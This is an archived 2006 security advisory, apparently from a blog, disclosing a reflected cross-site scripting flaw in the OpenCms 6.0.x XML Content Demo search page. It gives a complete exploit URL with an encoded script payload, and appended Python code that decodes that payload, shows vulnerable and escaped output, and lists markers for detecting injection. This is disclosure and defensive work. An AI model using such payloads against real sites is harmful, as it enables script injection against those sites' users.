You are in the eazel blog archives for Monday, 22 May 2006.

Archive for 22 May 2006

OpenCms 6.0.X Xml Content Demo search engine xss

Versions tested:
- 6.0.0
- 6.0.2
- 6.0.3
Discovered by: jaime.blasco(at)eazel(dot).es
http://www.eazel.es
Description: Input passed to the search query in the Xml Content Demo search engine isn't properly sanitised. This can be exploited to conduct cross-site scripting attacks.
Example:

http://host/opencms/opencms/system/modules/org.opencms.frontend.templateone/pages/search.html?action=search&query=%22%3E%3Cscript%3Ealert%28'www.eazel.es'%29%3C%2Fscript%3E%3C!-&index=Online+project+%28VFS%29&page=1&uri=%2Fxmlcontentdemo%2Fside_element_demo.html&__locale=en&query2=%3Cscript%3Ealert%28a%29%3C%2Fscript%3E
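As an added example (not part of the advisory and not OpenCms code), the Python below decodes the request above, contrasts the vulnerable verbatim echo of the search term with an HTML-encoded one, and flags search requests whose parameters carry markup. The two render functions assume a hypothetical search input field and stand in for the real template; the flagging list is a constructed starting point, not an OpenCms signature.

```python
import html
from urllib.parse import parse_qs, urlsplit

# The request from the advisory, used here as the sample input.
ADVISORY_URL = (
    "http://host/opencms/opencms/system/modules/org.opencms.frontend.templateone"
    "/pages/search.html?action=search&query=%22%3E%3Cscript%3Ealert%28'www.eazel.es'"
    "%29%3C%2Fscript%3E%3C!-&index=Online+project+%28VFS%29&page=1"
    "&uri=%2Fxmlcontentdemo%2Fside_element_demo.html&__locale=en"
    "&query2=%3Cscript%3Ealert%28a%29%3C%2Fscript%3E"
)

# Constructed benign request to the same page, for comparison.
BENIGN_URL = (
    "http://host/opencms/opencms/system/modules/org.opencms.frontend.templateone"
    "/pages/search.html?action=search&query=opencms&page=1"
)


def search_params(url):
    """Return the URL-decoded query parameters of a request as a flat dict."""
    parsed = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {name: values[0] for name, values in parsed.items()}


def render_unsafe(term):
    """Vulnerable pattern (hypothetical field): the term is echoed verbatim."""
    return '<input name="query" value="%s">' % term


def render_safe(term):
    """Hardened pattern: HTML-encode the term (including quotes) before markup."""
    return '<input name="query" value="%s">' % html.escape(term, quote=True)


# Constructed markers a defender might look for in a search term after decoding.
SUSPICIOUS = ("<", ">", "javascript:", "onerror=", "onload=")


def flag_request(url):
    """Return the sorted names of parameters whose decoded value contains markup."""
    hits = []
    for name, value in search_params(url).items():
        low = value.lower()
        if any(marker in low for marker in SUSPICIOUS):
            hits.append(name)
    return sorted(hits)
```

Running flag_request over access-log request lines for search.html is enough to spot attempts of this kind; the fix on the application side is the encoding shown in render_safe.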

Keywords: advisory002-OpenCms-Xml-Content-Demo-search-engine-Cross-site-scripting.php